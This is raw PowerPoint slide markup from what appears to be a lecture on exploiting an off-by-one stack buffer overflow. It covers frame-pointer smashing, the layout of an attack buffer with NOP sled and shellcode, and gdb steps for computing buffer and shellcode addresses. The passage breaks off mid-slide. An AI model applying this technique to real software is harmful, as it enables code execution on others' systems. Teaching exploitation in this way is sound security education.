            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>pointer takes frame pointer’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If we can control the frame pointer we can control the stack pointer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack pointer is now (frame pointer + 4 bytes) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The saved program counter is popped from the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Program counter becomes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>*(original frame </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>pointer + 4 bytes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="158054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2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2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2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2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2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23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23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23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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Exploiting an Off-by-one Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1124355" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By modifying the value of the saved frame pointer it is possible to provide an arbitrary value for the new stack pointer, and, in turn, for the value to be popped into the program counter </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This can be exploited to jump to attacker-supplied code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>he attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>buffer is:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nops</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lowest order byte of frame pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="79705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4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4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4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4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4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43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4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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="1885950"/>
            <a:ext cx="2057400" cy="3657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26403" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="3257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26404" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="3829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26405" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="45148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26406" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="5257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nops</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1126407" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="5543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8"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3886200" y="4171950"/>
            <a:ext cx="76200" cy="285750"/>
            <a:chOff x="1392" y="2880"/>
            <a:chExt cx="48" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1126409" name="Oval 9"/>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10" name="Oval 10"/>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11" name="Oval 11"/>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26412" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="29718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26413" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="20574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26414" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="234315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26415" name="AutoShape 15"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5105400" y="205740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16" name="AutoShape 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5105400" y="2971800"/>
            <a:ext cx="152400" cy="2857500"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 20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17" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="4894661" y="24608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26418" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="4894661" y="42896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sp>
        <p:nvSpPr>
          <p:cNvPr id="1126419" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="325755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26420" name="Line 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4800600" y="3371850"/>
            <a:ext cx="1219200" cy="5715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sz="1600">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1126421" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096000" y="3143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ebp[3]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1126422" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="3543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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 23"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3886200" y="4914900"/>
            <a:ext cx="76200" cy="285750"/>
            <a:chOff x="1392" y="2880"/>
            <a:chExt cx="48" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1126424" name="Oval 24"/>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25" name="Oval 25"/>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26" name="Oval 26"/>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26428" name="Rectangle 28"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Smashing the Frame Pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="88780797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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Finding the Buffer Address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1128451" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We need to be able to determine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>address of the buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find stack pointer value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) at start of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> with debugger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) disassemble </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>func</a:t>
            </a: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	Dump of assembler code for function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	0x8048134 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;:       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pushl</a:t>
            </a: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ebp</a:t>
            </a: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	0x8048135 &lt;func+1&gt;:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a: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esp,%ebp</a:t>
            </a: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	0x8048137 &lt;func+3&gt;:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>subl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   $0x104,%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	0x804813d &lt;func+9&gt;:     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>nop</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) break *0x804813d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	Breakpoint 1 at 0x804813d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) info register </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a: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esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>            0xbffffc60       0xbffffc60</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&amp;buffer = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>+ 4 // the size of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="155043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8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8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8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84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84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84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84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84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84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84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2845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845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2845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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Determining &amp;&amp;shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1170435" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From the buffer address, we have to determine where the four bytes containing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> address are</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add 256 bytes to account for the buffer length</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Subtract 4 bytes for size of pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = 0xbffffc64 + 0x100 - 0x04 = 0xbffffd60</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="49905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0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0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0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0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a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Computing the Overflowing Byte </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>and &amp;shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1130499" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>With high likelihood, the most significant 3 bytes of %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and &amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> are the same</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We want %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to be (&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> - 4), since %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is incremented when %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is popped from stack (</a:t>
            </a:r>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ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Desired byte is (&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
